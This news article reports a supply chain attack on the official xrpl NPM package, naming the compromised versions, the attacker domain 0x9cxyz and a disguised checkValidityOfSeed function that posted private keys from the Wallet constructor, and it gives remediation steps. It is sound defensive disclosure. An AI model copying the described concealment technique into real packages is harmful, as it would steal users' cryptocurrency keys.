Backdoor Found in Official XRP Ledger NPM Package

XRP Ledger SDK hit by supply chain attack: Malicious NPM versions stole private keys; users urged to update xrpl package to 4.2.5 or 2.14.3 immediately.

A serious security breach targeting users of the XRP Ledger has been uncovered by the Aikido Intel threat detection system. Aikido’s research reveals that it was a sophisticated supply chain attack that compromised the official xrpl Node Package Manager (NPM) package, a widely utilized software development kit (SDK) for interacting with the XRP Ledger.

This malicious infiltration resulted in the introduction of a backdoor designed to steal users’ private keys, granting attackers complete control over their cryptocurrency wallets. Suspicion was raised on April 21st at 20:53 GMT+0 when five newly released versions of the xrpl package on NPM, which has over 140,000 weekly downloads, contained malicious code that did not align with the official releases on GitHub.

The compromised versions were 4.2.4, 4.2.3, 4.2.2, 4.2.1, and 2.14.2 whereas the latest legitimate version on GitHub was 4.2.0 at the time of the attack. This discrepancy raised concerns.

“The fact that these packages showed up without a matching release on GitHub is very suspicious,” Aikido’s malware researcher Charlie Eriksen revealed in the blog post shared exclusively with Hackread.com.

Further probing revealed unusual code in the src/index.ts file of version 4.2.4 of rogue packages (tagged as the latest version), which had a harmless-looking function named checkValidityOfSeed, but it led to an HTTP POST request to an unfamiliar domain, 0x9cxyz. The domain’s registration information analysis indicated it was newly created, fuelling concerns about its legitimacy.

Digging deeper, researchers discovered that checkValidityOfSeed was being called within critical functions, including the constructor of the Wallet class in src/Wallet/index.ts. This allowed the malicious code to execute when a Wallet object was instantiated within an application using the compromised xrpl package, attempting to send the user’s private key (needed to access and manage a user’s XRP funds) to the attacker’s server.

This allowed the backdoor to steal private keys “as soon as a Wallet object is instantiated.”

Researchers also noted that attackers’ methods evolved. Initial malicious versions (4.2.1 and 4.2.2) showed different modifications compared to later compromised versions. The first versions introduced malicious code into built JavaScript files, removing scripts and prettier configurations (the settings and rules that govern how the Prettier code formatter automatically formats your code) from the package.json file. Versions 4.2.3 and 4.2.4 integrated the malicious code directly into the TypeScript source code, indicating a refinement in their approach to remain undetected.

Following the disclosure of this supply chain attack, the official xrpl team released two new, clean versions of the package: 4.2.5 and 2.14.3. Users are strongly encouraged to update to these secure versions immediately to mitigate any potential risk.

Researchers also highlighted that “any seed or private key that was processed by the code has been compromised,” and hence should be considered unusable. Any cryptocurrency assets associated with them should be immediately transferred to a new, secure wallet with a newly generated private key.